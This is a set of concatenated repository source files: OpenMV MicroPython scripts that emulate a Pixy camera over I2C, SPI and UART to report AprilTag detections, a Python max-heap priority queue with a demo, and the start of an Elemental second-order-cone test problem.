    # Map a Pixy-style 0..1000 command (clamped) onto servo 1's pulse-width range.
    s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup: I2C slave on bus 2 (P4 = SCL, P5 = SDA), addressed by the host.
bus = pyb.I2C(2, pyb.I2C.SLAVE, addr = i2c_address)
def write(data):
    """Send ``data`` to the I2C master in 2-byte packets, IRQs disabled throughout."""
    # Prepare the data to transmit first so we can do it quickly.
    out_data = []
    for i in range(0, len(data), 2):
        out_data.append(data[i:i+2])
    # Disable interrupts so we can send all packets without gaps.
    state = pyb.disable_irq()
    for i in range(len(out_data)):
        # Retry each packet a bounded number of times; give up on the whole
        # transfer (restoring IRQs) once a packet exhausts its retries.
        max_exceptions = 10
        loop = True
        while(loop):
            try:
                bus.send(out_data[i], timeout = 1)
                loop = False
            except OSError as error:
                if(max_exceptions <= 0):
                    pyb.enable_irq(state)
                    return
                max_exceptions -= 1
    pyb.enable_irq(state)
def available():
    """Always 0.

    Not implemented: as an I2C slave we have no way to signal readiness to
    receive data, so we report that nothing is available.
    """
    return 0
def read_byte():
    """Always 0.

    Not implemented: as an I2C slave we have no way to signal readiness to
    receive data, so there is never a byte to read.
    """
    return 0
# Helper Stuff
def checksum(data):
    """Sum ``data`` as little-endian 16-bit words, truncated to 16 bits."""
    words = (((data[i + 1] & 0xFF) << 8) | (data[i + 0] & 0xFF)
             for i in range(0, len(data), 2))
    return sum(words) & 0xFFFF
def to_object_block_format(tag):
    """Serialize *tag* as a Pixy color-code block: sync word, checksum, 12-byte payload.

    Tag ids get 8 added so they land in the Pixy color-code signature range
    (see the module header note); rotation is reported in whole degrees.
    """
    angle = int((tag.rotation() * 180) // math.pi)
    payload = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
    # BUG FIX: pack the sync word and checksum as unsigned ("<HH12s").
    # The original "<hh12s" feeds 0xAA56 (and any checksum >= 0x8000) into a
    # *signed* short, which raises struct.error on CPython; MicroPython's
    # struct is lax about the range, which is presumably why it worked on
    # device.  The emitted bytes are identical for all in-range values.
    return struct.pack("<HH12s", 0xAA56, checksum(payload), payload)
# FSM Code
# Receive-side state machine for host commands: a 0x00 byte followed by
# 0xFF/0xFE/0xFD selects the servo/camera/LED control sequences handled in
# parse_byte() below.
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
global fsm_state
global last_byte
if fsm_state == FSM_STATE_NONE:
if byte == 0x00: fsm_state = FSM_STATE_ZERO
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_ZERO:
if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
else: fsm_state = FSM_STATE_NONE
elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
fsm_state = FSM_STATE_SERVO_CONTROL_1
elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
fsm_state = FSM_STATE_SERVO_CONTROL_2
s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
fsm_state = FSM_STATE_SERVO_CONTROL_3
elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
fsm_state = FSM_STATE_NONE
s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
elif fsm_state == FSM_STATE_CAMERA_CONTROL:
fsm_state = FSM_STATE_NONE
# Ignore...
elif fsm_state == FSM_STATE_LED_CONTROL_0:
fsm_state = FSM_STATE_LED_CONTROL_1
if byte & 0x80: red_led.on()
else: red_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_1:
fsm_state = FSM_STATE_LED_CONTROL_2
if byte & 0x80: green_led.on()
else: green_led.off()
elif fsm_state == FSM_STATE_LED_CONTROL_2:
fsm_state = FSM_STATE_NONE
if byte & 0x80: blue_led.on()
else: blue_led.off()
last_byte = byte
# Main Loop
# MicroPython's time.clock() FPS helper (not available in CPython >= 3.8).
clock = time.clock()
while(True):
    clock.tick()
    img = sensor.snapshot()
    tags = img.find_apriltags() # default TAG36H11 family
    # Transmit Tags #
    if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
        # Frame sync word.  NOTE(review): 0xAA55 overflows the signed "h"
        # format; MicroPython truncates silently but CPython would raise.
        dat_buf = struct.pack("<h", 0xAA55)
        id_map = {}
        first_b = False
        # Largest tags first; hard cap at max_blocks detections per frame.
        for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
            # Count detections per tag id so each id is capped as well.
            if not tag.id() in id_map:
                id_map[tag.id()] = 1
            else:
                id_map[tag.id()] += 1
            if id_map[tag.id()] <= max_blocks_per_id:
                dat_buf += to_object_block_format(tag)
                img.draw_rectangle(tag.rect())
                img.draw_cross(tag.cx(), tag.cy())
            if dac and not first_b:
                # Mirror the largest tag's position on the analog pin,
                # scaled into the DAC's 0-255 range.
                x_scale = 255 / (img.width()-1)
                y_scale = 255 / (img.height()-1)
                # NOTE(review): uses tag.x()/tag.y() (bounding-box corner),
                # not cx()/cy() (center) -- confirm which is intended.
                dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
                first_b = True
        # A zero word terminates the frame.
        dat_buf += struct.pack("<h", 0x0000)
        write(dat_buf) # write all data in one packet...
    else: # nothing found
        write(struct.pack("<h", 0x0000))
        if dac:
            dac.write(0)
    # Parse Commands #
    for i in range(available()):
        parse_byte(read_byte())
    num_tags = min(len(tags), max_blocks)
    print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/OpenMV/17-Pixy-Emulation/apriltags_pixy_i2c_emulation.py",
"copies": "5",
"size": "7365",
"license": "mit",
"hash": 3275424195161561600,
"line_mean": 29.0612244898,
"line_max": 103,
"alpha_frac": 0.6027155465,
"autogenerated": false,
"ratio": 2.9519038076152304,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.005781591577918909,
"num_lines": 245
} |
# AprilTags Pixy SPI Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in SPI mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P0 = MOSI
# P1 = MISO
# P2 = SCLK
# P3 = SS
#
# P7 = Servo 1
# P8 = Servo 2
# Note: Please make sure your Arduino, etc. is running its SPI code before the
# OpenMV Cam starts running. Additionally, sometimes the OpenMV Cam is
# unable to sync up with the Arduino SPI data stream. Just restart your
# OpenMV Cam when this happens. The OpenMV Cam should sync up within
# 1-9 tries. Use the serial or I2C version of this script otherwise.
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000
max_blocks_per_id = 1000
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
s0_pan.pulse_width(int((max_s0_limit - min_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((max_s1_limit - min_s1_limit) // 2)) # center
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup
# SPI slave.  The master is expected to clock out a 0x00 0x5A sync word;
# spin until it is seen so both ends agree on packet boundaries, then
# re-initialize the bus for the 16-bit transfers used for real data.
bus = pyb.SPI(2, pyb.SPI.SLAVE, polarity = 0, phase = 0, bits = 16)
while(True):
    try:
        sync_bytes = bus.recv(2, timeout = 10)
        if((sync_bytes[0] == 0x00) and (sync_bytes[1] == 0x5A)):
            break
    except OSError as error:
        # Timeouts are expected until the master starts clocking.
        pass
bus.deinit()
bus.init(pyb.SPI.SLAVE, polarity = 0, phase = 0, bits = 16)
def write(data):
    """Send ``data`` to the SPI master, retrying on bus errors."""
    max_exceptions = 10
    loop = True
    while(loop):
        try:
            bus.send(data, timeout = 10)
            loop = False
        except OSError as error:
            # Drop the frame after the retry budget is spent (the check
            # precedes the decrement, so up to 11 attempts are made).
            if(max_exceptions <= 0):
                return
            max_exceptions -= 1
def available():
    return 0 # Not implemented as there is no way for the us to be ready to receive the data.
def read_byte():
    return 0 # Not implemented as there is no way for the us to be ready to receive the data.
# Helper Stuff
def checksum(data):
    """Sum ``data`` as little-endian 16-bit words, modulo 2**16.

    ``data`` must have an even number of bytes; the Pixy payloads passed
    here are packed from 16-bit fields, so this always holds.
    """
    checksum = 0
    for i in range(0, len(data), 2):
        checksum += ((data[i+1] & 0xFF) << 8) | ((data[i+0] & 0xFF) << 0)
    return checksum & 0xFFFF
def to_object_block_format(tag):
    """Serialize an AprilTag detection as a Pixy color-code object block.

    Layout: sync word 0xAA56, 16-bit checksum of the payload, then the
    12-byte payload (signature, cx, cy, w, h, angle).  Tag ids get +8 so
    they land in the Pixy color-code signature range.
    """
    angle = int((tag.rotation() * 180) // math.pi) # radians -> whole degrees
    temp = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
    # Use unsigned "H" fields: 0xAA56 and the checksum exceed the signed
    # 16-bit range, and CPython's struct rejects out-of-range values for
    # "h" (MicroPython silently truncates).  The emitted bytes are
    # unchanged.
    return struct.pack("<HH12s", 0xAA56, checksum(temp), temp)
# FSM Code
# Byte-oriented parser for incoming Pixy commands.  Every command starts
# with a 0x00 byte followed by a command id:
#   0x00 0xFF -> servo set: pan (lo, hi) then tilt (lo, hi), little-endian
#   0x00 0xFE -> camera control: one parameter byte, ignored here
#   0x00 0xFD -> LED control: three bytes; bit 7 of each switches the
#                red, green, and blue LEDs respectively
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
    """Feed one received byte through the command state machine."""
    global fsm_state
    global last_byte
    if fsm_state == FSM_STATE_NONE:
        # Hunt for the 0x00 that opens every command.
        if byte == 0x00: fsm_state = FSM_STATE_ZERO
        else: fsm_state = FSM_STATE_NONE
    elif fsm_state == FSM_STATE_ZERO:
        if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
        elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
        elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
        else: fsm_state = FSM_STATE_NONE
    elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
        # Low byte of the pan value; picked up via last_byte next state.
        fsm_state = FSM_STATE_SERVO_CONTROL_1
    elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
        fsm_state = FSM_STATE_SERVO_CONTROL_2
        # Combine high byte (current) with low byte (previous).
        s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
    elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
        # Low byte of the tilt value.
        fsm_state = FSM_STATE_SERVO_CONTROL_3
    elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
        fsm_state = FSM_STATE_NONE
        s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
    elif fsm_state == FSM_STATE_CAMERA_CONTROL:
        fsm_state = FSM_STATE_NONE
        # Ignore...
    elif fsm_state == FSM_STATE_LED_CONTROL_0:
        fsm_state = FSM_STATE_LED_CONTROL_1
        if byte & 0x80: red_led.on()
        else: red_led.off()
    elif fsm_state == FSM_STATE_LED_CONTROL_1:
        fsm_state = FSM_STATE_LED_CONTROL_2
        if byte & 0x80: green_led.on()
        else: green_led.off()
    elif fsm_state == FSM_STATE_LED_CONTROL_2:
        fsm_state = FSM_STATE_NONE
        if byte & 0x80: blue_led.on()
        else: blue_led.off()
    last_byte = byte
# Main Loop
# MicroPython's time.clock() FPS helper (not available in CPython >= 3.8).
clock = time.clock()
while(True):
    clock.tick()
    img = sensor.snapshot()
    tags = img.find_apriltags() # default TAG36H11 family
    # Transmit Tags #
    if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
        # Frame sync word.  NOTE(review): 0xAA55 overflows the signed "h"
        # format; MicroPython truncates silently but CPython would raise.
        dat_buf = struct.pack("<h", 0xAA55)
        id_map = {}
        first_b = False
        # Largest tags first; hard cap at max_blocks detections per frame.
        for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
            # Count detections per tag id so each id is capped as well.
            if not tag.id() in id_map:
                id_map[tag.id()] = 1
            else:
                id_map[tag.id()] += 1
            if id_map[tag.id()] <= max_blocks_per_id:
                dat_buf += to_object_block_format(tag)
                img.draw_rectangle(tag.rect())
                img.draw_cross(tag.cx(), tag.cy())
            if dac and not first_b:
                # Mirror the largest tag's position on the analog pin,
                # scaled into the DAC's 0-255 range.
                x_scale = 255 / (img.width()-1)
                y_scale = 255 / (img.height()-1)
                # NOTE(review): uses tag.x()/tag.y() (bounding-box corner),
                # not cx()/cy() (center) -- confirm which is intended.
                dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
                first_b = True
        # A zero word terminates the frame.
        dat_buf += struct.pack("<h", 0x0000)
        write(dat_buf) # write all data in one packet...
    else: # nothing found
        write(struct.pack("<h", 0x0000))
        if dac:
            dac.write(0)
    # Parse Commands #
    for i in range(available()):
        parse_byte(read_byte())
    num_tags = min(len(tags), max_blocks)
    print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "openmv/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/17-Pixy-Emulation/apriltags_pixy_spi_emulation.py",
"copies": "5",
"size": "7644",
"license": "mit",
"hash": -6072259555726542000,
"line_mean": 29.2134387352,
"line_max": 103,
"alpha_frac": 0.6085818943,
"autogenerated": false,
"ratio": 2.961642774118559,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6070224668418559,
"avg_score": null,
"num_lines": null
} |
# AprilTags Pixy UART Emulation Script
#
# This script allows your OpenMV Cam to transmit AprilTag detection data like
# a Pixy (CMUcam5) tracking colors in UART mode. This script allows you to
# easily replace a Pixy (CMUcam5) color tracking sensor with an OpenMV Cam
# AprilTag tracking sensor. Note that this only runs on the OpenMV Cam M7.
#
# P4 = TXD
# P5 = RXD
#
# P7 = Servo 1
# P8 = Servo 2
# Note: The tag family is TAG36H11. Additionally, in order to for the
# signature value of a tag detection to be compatible with pixy
# interface libraries all tag ids have 8 added to them in order
# to move them in the color code signature range. Finally, tags
# are all reported as color code blocks...
# Pixy Parameters ############################################################
max_blocks = 1000
max_blocks_per_id = 1000
uart_baudrate = 19200
# Pan Servo
s0_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s0_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
# Tilt Servo
s1_lower_limit = 1000 # Servo pulse width lower limit in microseconds.
s1_upper_limit = 2000 # Servo pulse width upper limit in microseconds.
analog_out_enable = False # P6 -> Analog Out (0v - 3.3v).
analog_out_mode = 0 # 0 == x position of largest tag - 1 == y position of largest tag
##############################################################################
import image, math, pyb, sensor, struct, time
# Camera Setup
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA)
sensor.skip_frames(time = 2000)
# LED Setup
red_led = pyb.LED(1)
green_led = pyb.LED(2)
blue_led = pyb.LED(3)
red_led.off()
green_led.off()
blue_led.off()
# DAC Setup
dac = pyb.DAC("P6") if analog_out_enable else None
if dac:
dac.write(0)
# Servo Setup
min_s0_limit = min(s0_lower_limit, s0_upper_limit)
max_s0_limit = max(s0_lower_limit, s0_upper_limit)
min_s1_limit = min(s1_lower_limit, s1_upper_limit)
max_s1_limit = max(s1_lower_limit, s1_upper_limit)
s0_pan = pyb.Servo(1) # P7
s1_tilt = pyb.Servo(2) # P8
s0_pan.pulse_width(int((max_s0_limit - min_s0_limit) // 2)) # center
s1_tilt.pulse_width(int((max_s1_limit - min_s1_limit) // 2)) # center
s0_pan_conversion_factor = (max_s0_limit - min_s0_limit) / 1000
s1_tilt_conversion_factor = (max_s1_limit - min_s1_limit) / 1000
def s0_pan_position(value):
s0_pan.pulse_width(round(s0_lower_limit + (max(min(value, 1000), 0) * s0_pan_conversion_factor)))
def s1_tilt_position(value):
s1_tilt.pulse_width(round(s1_lower_limit + (max(min(value, 1000), 0) * s1_tilt_conversion_factor)))
# Link Setup
uart = pyb.UART(3, uart_baudrate, timeout_char = 1000)
def write(data):
    """Transmit ``data`` over the UART."""
    uart.write(data)
def available():
    """Return the count of bytes waiting in the UART receive buffer."""
    return uart.any()
def read_byte():
    """Read one received byte (blocks up to timeout_char)."""
    return uart.readchar()
# Helper Stuff
def checksum(data):
    """Sum ``data`` as little-endian 16-bit words, modulo 2**16.

    ``data`` must have an even number of bytes; the Pixy payloads passed
    here are packed from 16-bit fields, so this always holds.
    """
    checksum = 0
    for i in range(0, len(data), 2):
        checksum += ((data[i+1] & 0xFF) << 8) | ((data[i+0] & 0xFF) << 0)
    return checksum & 0xFFFF
def to_object_block_format(tag):
    """Serialize an AprilTag detection as a Pixy color-code object block.

    Layout: sync word 0xAA56, 16-bit checksum of the payload, then the
    12-byte payload (signature, cx, cy, w, h, angle).  Tag ids get +8 so
    they land in the Pixy color-code signature range.
    """
    angle = int((tag.rotation() * 180) // math.pi) # radians -> whole degrees
    temp = struct.pack("<hhhhhh", tag.id() + 8, tag.cx(), tag.cy(), tag.w(), tag.h(), angle)
    # Use unsigned "H" fields: 0xAA56 and the checksum exceed the signed
    # 16-bit range, and CPython's struct rejects out-of-range values for
    # "h" (MicroPython silently truncates).  The emitted bytes are
    # unchanged.
    return struct.pack("<HH12s", 0xAA56, checksum(temp), temp)
# FSM Code
# Byte-oriented parser for incoming Pixy commands.  Every command starts
# with a 0x00 byte followed by a command id:
#   0x00 0xFF -> servo set: pan (lo, hi) then tilt (lo, hi), little-endian
#   0x00 0xFE -> camera control: one parameter byte, ignored here
#   0x00 0xFD -> LED control: three bytes; bit 7 of each switches the
#                red, green, and blue LEDs respectively
fsm_state = 0
last_byte = 0
FSM_STATE_NONE = 0
FSM_STATE_ZERO = 1
FSM_STATE_SERVO_CONTROL_0 = 2
FSM_STATE_SERVO_CONTROL_1 = 3
FSM_STATE_SERVO_CONTROL_2 = 4
FSM_STATE_SERVO_CONTROL_3 = 5
FSM_STATE_CAMERA_CONTROL = 6
FSM_STATE_LED_CONTROL_0 = 7
FSM_STATE_LED_CONTROL_1 = 8
FSM_STATE_LED_CONTROL_2 = 9
def parse_byte(byte):
    """Feed one received byte through the command state machine."""
    global fsm_state
    global last_byte
    if fsm_state == FSM_STATE_NONE:
        # Hunt for the 0x00 that opens every command.
        if byte == 0x00: fsm_state = FSM_STATE_ZERO
        else: fsm_state = FSM_STATE_NONE
    elif fsm_state == FSM_STATE_ZERO:
        if byte == 0xFF: fsm_state = FSM_STATE_SERVO_CONTROL_0
        elif byte == 0xFE: fsm_state = FSM_STATE_CAMERA_CONTROL
        elif byte == 0xFD: fsm_state = FSM_STATE_LED_CONTROL_0
        else: fsm_state = FSM_STATE_NONE
    elif fsm_state == FSM_STATE_SERVO_CONTROL_0:
        # Low byte of the pan value; picked up via last_byte next state.
        fsm_state = FSM_STATE_SERVO_CONTROL_1
    elif fsm_state == FSM_STATE_SERVO_CONTROL_1:
        fsm_state = FSM_STATE_SERVO_CONTROL_2
        # Combine high byte (current) with low byte (previous).
        s0_pan_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
    elif fsm_state == FSM_STATE_SERVO_CONTROL_2:
        # Low byte of the tilt value.
        fsm_state = FSM_STATE_SERVO_CONTROL_3
    elif fsm_state == FSM_STATE_SERVO_CONTROL_3:
        fsm_state = FSM_STATE_NONE
        s1_tilt_position(((byte & 0xFF) << 8) | ((last_byte & 0xFF) << 0))
    elif fsm_state == FSM_STATE_CAMERA_CONTROL:
        fsm_state = FSM_STATE_NONE
        # Ignore...
    elif fsm_state == FSM_STATE_LED_CONTROL_0:
        fsm_state = FSM_STATE_LED_CONTROL_1
        if byte & 0x80: red_led.on()
        else: red_led.off()
    elif fsm_state == FSM_STATE_LED_CONTROL_1:
        fsm_state = FSM_STATE_LED_CONTROL_2
        if byte & 0x80: green_led.on()
        else: green_led.off()
    elif fsm_state == FSM_STATE_LED_CONTROL_2:
        fsm_state = FSM_STATE_NONE
        if byte & 0x80: blue_led.on()
        else: blue_led.off()
    last_byte = byte
# Main Loop
# MicroPython's time.clock() FPS helper (not available in CPython >= 3.8).
clock = time.clock()
while(True):
    clock.tick()
    img = sensor.snapshot()
    tags = img.find_apriltags() # default TAG36H11 family
    # Transmit Tags #
    if tags and (max_blocks > 0) and (max_blocks_per_id > 0): # new frame
        # Frame sync word.  NOTE(review): 0xAA55 overflows the signed "h"
        # format; MicroPython truncates silently but CPython would raise.
        dat_buf = struct.pack("<h", 0xAA55)
        id_map = {}
        first_b = False
        # Largest tags first; hard cap at max_blocks detections per frame.
        for tag in sorted(tags, key = lambda x: x.area(), reverse = True)[0:max_blocks]:
            # Count detections per tag id so each id is capped as well.
            if not tag.id() in id_map:
                id_map[tag.id()] = 1
            else:
                id_map[tag.id()] += 1
            if id_map[tag.id()] <= max_blocks_per_id:
                dat_buf += to_object_block_format(tag)
                img.draw_rectangle(tag.rect())
                img.draw_cross(tag.cx(), tag.cy())
            if dac and not first_b:
                # Mirror the largest tag's position on the analog pin,
                # scaled into the DAC's 0-255 range.
                x_scale = 255 / (img.width()-1)
                y_scale = 255 / (img.height()-1)
                # NOTE(review): uses tag.x()/tag.y() (bounding-box corner),
                # not cx()/cy() (center) -- confirm which is intended.
                dac.write(round((tag.y() * y_scale) if analog_out_mode else (tag.x() * x_scale)))
                first_b = True
        # A zero word terminates the frame.
        dat_buf += struct.pack("<h", 0x0000)
        write(dat_buf) # write all data in one packet...
    else: # nothing found
        write(struct.pack("<h", 0x0000))
        if dac:
            dac.write(0)
    # Parse Commands #
    for i in range(available()):
        parse_byte(read_byte())
    num_tags = min(len(tags), max_blocks)
    print("%d tags(s) found - FPS %f" % (num_tags, clock.fps()))
| {
"repo_name": "kwagyeman/openmv",
"path": "scripts/examples/Arduino/Portenta-H7/17-Pixy-Emulation/apriltags_pixy_uart_emulation.py",
"copies": "5",
"size": "6591",
"license": "mit",
"hash": -3672161168331681000,
"line_mean": 28.0352422907,
"line_max": 103,
"alpha_frac": 0.6094674556,
"autogenerated": false,
"ratio": 2.869394862864606,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0058659656637859384,
"num_lines": 227
} |
#A priority queue is common implemented with a heap
"""
Basic operations:
1. insert_with_priority
2. pull_highest_priority_item
3. peek
Difference between heap and priority queue:
1. Heap is ONE implementation of a priority queue, and it's tree-based.
2. Priority Queue is an abstract data structure.
"""
import heapq
# heapq is a min heap, smallest item in the top
class PriorityQueue:
    """Max-first priority queue built on heapq's min-heap.

    Priorities are negated on push so the largest priority pops first;
    a monotonically increasing sequence number breaks ties in FIFO
    order (and keeps items from ever being compared directly).
    """
    def __init__(self):
        self._queue = []
        self._index = 0
    def push(self, item, priority):
        """Insert ``item``; higher ``priority`` values pop earlier."""
        entry = (-priority, self._index, item)
        heapq.heappush(self._queue, entry)
        self._index += 1
    def pop(self):
        """Remove and return the highest-priority item (FIFO on ties)."""
        _, _, item = heapq.heappop(self._queue)
        return item
class Node:
    """Container wrapping a single comparable value for the heap below."""
    def __init__(self, data):
        self.data = data
class pq:
    """Array-backed max-heap priority queue of ``Node`` objects.

    Fixes over the previous version: ``pop`` now actually removes the
    root (it used to overwrite it with a sentinel ``Node(0)`` and never
    shrink ``length``, so the heap filled with zeros and ``length``
    drifted), and index arithmetic uses integer division so it also
    works under Python 3.
    """
    def __init__(self):
        self.queue = []
        self.length = 0
    def sift(self, root, n):
        """Sift the element at ``root`` down within the first ``n`` slots."""
        left = root*2 + 1
        right = root*2 + 2
        biggest = root
        if left < n and self.queue[left].data > self.queue[biggest].data:
            biggest = left
        if right < n and self.queue[right].data > self.queue[biggest].data:
            biggest = right
        if biggest != root:
            self.queue[root], self.queue[biggest] = self.queue[biggest], self.queue[root]
            # Recurse on the consistent bound n (not self.length).
            self.sift(biggest, n)
    def heapify(self):
        """Restore the max-heap property over the whole queue."""
        start = self.length // 2 - 1  # last internal node
        while start >= 0:
            self.sift(start, self.length)
            start -= 1
    def insert(self, node):
        """Add ``node`` and re-establish the heap property."""
        self.queue.append(node)
        self.length += 1
        if self.length == 1:
            return
        self.heapify()
    def pop(self):
        """Remove and return the node with the largest ``data``."""
        node = self.queue[0]
        self.length -= 1
        # Move the last element to the root, then sift it down.
        last = self.queue.pop()
        if self.length > 0:
            self.queue[0] = last
            self.sift(0, self.length)
        return node
    def peek(self):
        """Return (without removing) the node with the largest ``data``."""
        return self.queue[0]
    def __str__(self):
        return ' '.join(str(node.data) for node in self.queue)
# Smoke test: fill the max-heap with 1..7 and pop the largest values.
# (Python 2 print statements -- this demo does not run under Python 3.)
p = pq()
node1 = Node(1)
node2 = Node(2)
node3 = Node(3)
node4 = Node(4)
node5 = Node(5)
node6 = Node(6)
node7 = Node(7)
p.insert(node1)
print p
p.insert(node2)
p.insert(node3)
print p
p.insert(node4)
p.insert(node5)
p.insert(node6)
p.insert(node7)
print p
# The largest value should come off first.
print p.pop().data
print p
print p.peek().data
| {
"repo_name": "armsky/Algorithms",
"path": "Data Structure/priorityQueue.py",
"copies": "1",
"size": "2385",
"license": "apache-2.0",
"hash": -3157268401486982700,
"line_mean": 22.1553398058,
"line_max": 89,
"alpha_frac": 0.572327044,
"autogenerated": false,
"ratio": 3.3310055865921786,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4403332630592178,
"avg_score": null,
"num_lines": null
} |
# A problematic SOC problem from CVXPY's tests.
import El
El.Initialize()
# Cone metadata for 7 second-order cones, each of dimension 3:
# orders[i] is the size of the cone containing entry i, firstInds[i] the
# index at which that cone starts, and labels[i] the cone's number.
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
labels = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
labels.Resize(21,1)
for c in xrange(7):
    for i in xrange(3):
        orders.Set(3*c+i,0,3)
        firstInds.Set(3*c+i,0,3*c)
        labels.Set(3*c+i,0,c)
# h: right-hand side of the conic constraint G x + s = h, s in K.
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
# Linear objective: minimize c^T x = x_1.
# (Note: this rebinds the loop variable c from above.)
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
# G: 21x8 sparse conic-constraint matrix with 28 explicit nonzeros.
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1 )
G.QueueUpdate( 0, 4, -1 )
G.QueueUpdate( 1, 3, -1 )
G.QueueUpdate( 1, 4, 1 )
G.QueueUpdate( 2, 2, -2 )
G.QueueUpdate( 3, 5, -1 )
